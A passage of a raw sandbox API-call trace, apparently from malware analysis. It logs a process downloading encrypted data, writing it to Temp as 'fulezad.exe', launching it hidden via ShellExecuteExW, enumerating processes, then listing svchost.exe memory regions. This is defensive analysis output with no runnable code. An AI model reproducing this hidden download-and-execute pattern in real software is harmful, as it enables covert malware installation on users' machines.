DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3129cd0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3129cd0, pfQOP=0x0) returned 0x0 [0082.182] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.182] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.182] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 16416 [0082.183] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x3129ec0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3129ec0, pfQOP=0x0) returned 0x0 [0082.183] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.183] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.183] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 4491 [0082.183] recv (in: s=0x4d8, buf=0x3125bb8, len=11925, flags=0 | out: buf=0x3125bb8*) returned 8760 [0082.332] recv (in: s=0x4d8, buf=0x3127df0, len=3165, flags=0 | out: buf=0x3127df0*) returned 3165 [0082.332] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312a0b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312a0b0, pfQOP=0x0) returned 0x0 [0082.333] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.333] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.333] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 14350 [0082.333] recv (in: s=0x4d8, buf=0x312823b, len=2066, flags=0 | out: buf=0x312823b*) returned 2066 [0082.481] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312a2a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312a2a0, pfQOP=0x0) returned 0x0 [0082.481] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.482] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.482] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 16416 [0082.482] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312a490, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312a490, pfQOP=0x0) returned 0x0 [0082.483] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.483] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.483] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 7788 [0082.483] recv (in: s=0x4d8, buf=0x3126899, len=8628, flags=0 | out: buf=0x3126899*) returned 5840 [0082.636] recv (in: s=0x4d8, buf=0x3127f69, len=2788, flags=0 | out: buf=0x3127f69*) returned 1460 [0082.636] recv (in: s=0x4d8, buf=0x312851d, len=1328, flags=0 | out: buf=0x312851d*) returned 1328 [0082.637] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312a680, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312a680, pfQOP=0x0) returned 0x0 [0082.638] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.638] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.638] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 16416 [0082.638] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312a870, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312a870, pfQOP=0x0) returned 0x0 [0082.639] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.639] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.639] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 2686 [0082.639] recv (in: s=0x4d8, buf=0x31254ab, len=13730, flags=0 | out: buf=0x31254ab*) returned 4380 [0082.785] recv (in: s=0x4d8, buf=0x31265c7, len=9350, flags=0 | out: buf=0x31265c7*) returned 9350 [0082.785] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312aa60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312aa60, pfQOP=0x0) returned 0x0 [0082.785] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.786] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.787] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 11085 [0082.787] recv (in: s=0x4d8, buf=0x312757a, len=5331, flags=0 | out: buf=0x312757a*) returned 5331 [0082.939] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312ac50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312ac50, pfQOP=0x0) returned 0x0 [0082.939] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.940] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.941] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 16416 [0082.941] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312ae40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312ae40, pfQOP=0x0) returned 0x0 [0082.941] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0082.942] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0082.942] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 11823 [0082.942] recv (in: s=0x4d8, buf=0x312785c, len=4593, flags=0 | out: buf=0x312785c*) returned 4593 [0083.091] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312b030, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312b030, pfQOP=0x0) returned 0x0 [0083.091] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0083.091] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0083.091] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 16416 [0083.092] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312b220, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312b220, pfQOP=0x0) returned 0x0 [0083.092] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0083.092] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0083.092] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 8181 [0083.092] recv (in: s=0x4d8, buf=0x3126a22, len=8235, flags=0 | out: buf=0x3126a22*) returned 8235 [0083.274] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312b410, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312b410, pfQOP=0x0) returned 0x0 [0083.274] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0083.274] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0083.275] recv (in: s=0x4d8, buf=0x3124a2d, len=16416, flags=0 | out: buf=0x3124a2d*) returned 1980 [0083.275] recv (in: s=0x4d8, buf=0x31251e9, len=14436, flags=0 | out: buf=0x31251e9*) returned 14436 [0083.279] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312b600, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312b600, pfQOP=0x0) returned 0x0 [0083.279] WriteFile (in: hFile=0x3a4, lpBuffer=0x3114998*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c8ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x3114998*, lpNumberOfBytesWritten=0x1c8ecfc8*=0x4000, lpOverlapped=0x0) returned 1 [0083.280] recv (in: s=0x4d8, buf=0x3124a28, len=5, flags=0 | out: buf=0x3124a28*) returned 5 [0083.280] recv (in: s=0x4d8, buf=0x3124a2d, len=4976, flags=0 | out: buf=0x3124a2d*) returned 4539 [0083.280] recv (in: s=0x4d8, buf=0x3125be8, len=437, flags=0 | out: buf=0x3125be8*) returned 437 [0083.428] DecryptMessage (in: phContext=0x1c8ec9c0, pMessage=0x312b7f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x312b7f0, pfQOP=0x0) returned 0x0 [0083.429] SetEvent (hEvent=0x36c) returned 1 [0083.493] CoTaskMemAlloc (cb=0x104) returned 0x1b96ee90 [0083.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96ee90, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.493] CoTaskMemFree (pv=0x1b96ee90) [0083.494] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b96ee90, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24 [0083.495] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b96ee90, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24 [0083.505] CoTaskMemAlloc (cb=0x104) returned 0x1b96ee90 [0083.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96ee90, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.676] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", nBufferLength=0x105, lpBuffer=0x1c8ed360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", lpFilePart=0x0) returned 0x30 [0083.676] SetErrorMode (uMode=0x1) returned 0x1 [0083.677] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8ed5c0 | out: lpFileInformation=0x1c8ed5c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd096a830, ftCreationTime.dwHighDateTime=0x1d4be3a, ftLastAccessTime.dwLowDateTime=0xd096a830, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xd8aff5d0, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x5d350)) returned 1 [0083.677] SetErrorMode (uMode=0x1) returned 0x1 [0083.677] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", nBufferLength=0x105, lpBuffer=0x1c8ed950, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", lpFilePart=0x0) returned 0x30 [0083.677] SetErrorMode (uMode=0x1) returned 0x1 [0083.677] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8edb60 | out: lpFileInformation=0x1c8edb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd096a830, ftCreationTime.dwHighDateTime=0x1d4be3a, ftLastAccessTime.dwLowDateTime=0xd096a830, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xd8aff5d0, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x5d350)) returned 1 [0083.678] SetErrorMode (uMode=0x1) returned 0x1 [0083.678] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", nBufferLength=0x105, lpBuffer=0x1c8ed8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", lpFilePart=0x0) returned 0x30 [0083.678] SetErrorMode (uMode=0x1) returned 0x1 [0083.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8edae0 | out: lpFileInformation=0x1c8edae0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd096a830, ftCreationTime.dwHighDateTime=0x1d4be3a, ftLastAccessTime.dwLowDateTime=0xd096a830, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xd8aff5d0, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x5d350)) returned 1 [0083.678] SetErrorMode (uMode=0x1) returned 0x1 [0083.678] CoTaskMemAlloc (cb=0x104) returned 0x1b96ee90 [0083.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96ee90, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.679] CoTaskMemFree (pv=0x1b96ee90) [0083.679] CoTaskMemAlloc (cb=0x104) returned 0x1b96ee90 [0083.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96ee90, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.679] CoTaskMemFree (pv=0x1b96ee90) [0083.682] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x1c8ed4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0083.682] SetErrorMode (uMode=0x1) returned 0x1 [0083.682] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c8ed730 | out: lpFileInformation=0x1c8ed730*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xc1fb1810, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xc1fb1810, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0083.682] SetErrorMode (uMode=0x1) returned 0x1 [0083.682] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x1c8ed4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0083.682] SetErrorMode (uMode=0x1) returned 0x1 [0083.682] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c8ed730 | out: lpFileInformation=0x1c8ed730*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xc1fb1810, ftLastAccessTime.dwHighDateTime=0x1d4be3a, ftLastWriteTime.dwLowDateTime=0xc1fb1810, ftLastWriteTime.dwHighDateTime=0x1d4be3a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0083.682] SetErrorMode (uMode=0x1) returned 0x1 [0083.686] LocalAlloc (uFlags=0x0, uBytes=0x62) returned 0x1ce18f90 [0083.687] RtlMoveMemory (in: Destination=0x1ce18f90, Source=0x3179278, Length=0x62 | out: Destination=0x1ce18f90) [0083.687] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x169770 [0083.687] RtlMoveMemory (in: Destination=0x169770, Source=0x31830f0, Length=0x34 | out: Destination=0x169770) [0084.297] NtQueryInformationProcess (in: ProcessHandle=0x7a8, ProcessInformationClass=0x0, ProcessInformation=0x3183968, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x3183968, ReturnLength=0x0) returned 0x0 [0084.298] EnumProcesses (in: lpidProcess=0x31839b0, cb=0x400, lpcbNeeded=0x1c8edf90 | out: lpidProcess=0x31839b0, lpcbNeeded=0x1c8edf90) returned 1 [0084.302] SetEvent (hEvent=0x338) returned 1 [0084.302] SetEvent (hEvent=0x320) returned 1 [0084.302] SetEvent (hEvent=0x330) returned 1 [0084.302] SetEvent (hEvent=0x334) returned 1 [0084.302] SetEvent (hEvent=0x398) returned 1 [0084.302] SetEvent (hEvent=0x33c) returned 1 [0084.302] SetEvent (hEvent=0x340) returned 1 [0084.302] SetEvent (hEvent=0x344) returned 1 [0084.302] SetEvent (hEvent=0x39c) returned 1 [0084.309] CoUninitialize () Thread: id = 82 os_tid = 0xb8c Thread: id = 83 os_tid = 0xb90 [0069.583] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0069.586] ResetEvent (hEvent=0x36c) returned 1 Thread: id = 87 os_tid = 0x818 Thread: id = 88 os_tid = 0x828 Thread: id = 102 os_tid = 0x628 [0083.689] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0083.696] ShellExecuteExW (in: pExecInfo=0x3183708*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", lpParameters=0x0, lpDirectory="C:\\Users\\aETAdzjz\\Desktop", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x3183708*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", lpParameters=0x0, lpDirectory="C:\\Users\\aETAdzjz\\Desktop", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x7a8)) returned 1 [0084.011] CoGetContextToken (in: pToken=0x1c97f350 | out: pToken=0x1c97f350) returned 0x0 [0084.178] CoUninitialize () Thread: id = 104 os_tid = 0x6c8 [0084.660] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0084.661] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0084.661] VirtualQuery (in: lpAddress=0x1d9ad8a0, lpBuffer=0x1d9ae760, dwLength=0x30 | out: lpBuffer=0x1d9ae760*(BaseAddress=0x1d9ad000, AllocationBase=0x1d020000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.662] VirtualQuery (in: lpAddress=0x1d9adb50, lpBuffer=0x1d9aea10, dwLength=0x30 | out: lpBuffer=0x1d9aea10*(BaseAddress=0x1d9ad000, AllocationBase=0x1d020000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.668] SetEvent (hEvent=0x740) returned 1 [0084.669] SetEvent (hEvent=0x738) returned 1 [0084.669] SetEvent (hEvent=0x750) returned 1 [0084.669] SetEvent (hEvent=0x740) returned 1 [0084.669] SetEvent (hEvent=0x738) returned 1 [0084.669] SetEvent (hEvent=0x7b0) returned 1 [0084.669] SetEvent (hEvent=0x79c) returned 1 [0084.669] SetEvent (hEvent=0x764) returned 1 [0084.669] SetEvent (hEvent=0x7ac) returned 1 [0084.669] SetEvent (hEvent=0x7b4) returned 1 [0084.670] CoUninitialize () Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7275e000" os_pid = "0x368" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x948" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 711 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 712 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 713 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 714 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 715 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 716 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 717 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 718 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 719 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 720 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 721 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 722 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 723 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 724 start_va = 0x390000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 725 start_va = 0x520000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 726 start_va = 0x6b0000 end_va = 0x76ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 727 start_va = 0x770000 end_va = 0xb62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 728 start_va = 0xb70000 end_va = 0xb70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 729 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 730 start_va = 0xb90000 end_va = 0xb90fff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 731 start_va = 0xba0000 end_va = 0xba1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 732 start_va = 0xbb0000 end_va = 0xbb3fff entry_point = 0xbb0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 733 start_va = 0xbc0000 end_va = 0xbc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 734 start_va = 0xbd0000 end_va = 0xbfffff entry_point = 0xbd0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 735 start_va = 0xc00000 end_va = 0xc03fff entry_point = 0xc00000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 736 start_va = 0xc10000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 737 start_va = 0xc90000 end_va = 0xc90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 738 start_va = 0xca0000 end_va = 0xcbbfff 